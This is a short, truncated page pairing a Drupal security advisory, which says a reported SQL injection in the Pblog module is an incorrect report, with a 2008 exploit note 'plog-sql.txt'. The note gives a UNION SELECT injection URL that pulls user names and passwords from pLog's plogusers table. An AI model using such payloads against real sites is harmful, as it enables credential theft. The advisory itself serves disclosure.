SA-2008-031 - Pblog - Incorrect vulnerability report

Exploitable from: Remote Subject: Incorrect vulnerability report Several 'security'-related sources claim - with SecurityFocus as source http://www.securityfocus.com/bid/29495/info - that the third-party Drupal module Pblog is vulnerable to SQL injection attacks. The Drupal security team has...

plog-sql.txt

pLog albumId Remote Sql İnj. DreamTurk / [email protected] Down : http://drupal.org/project/pblog http://localhost/index.php?op=ViewAlbum&albumId=-1//union//select//0,1,user,password,4,5,6,7,8 from plogusers/&blogId=1 4ever sqL L0v3r'Z Crew 2008 http://coderx.org Greatz : Cr@zyKing & BLasTer &...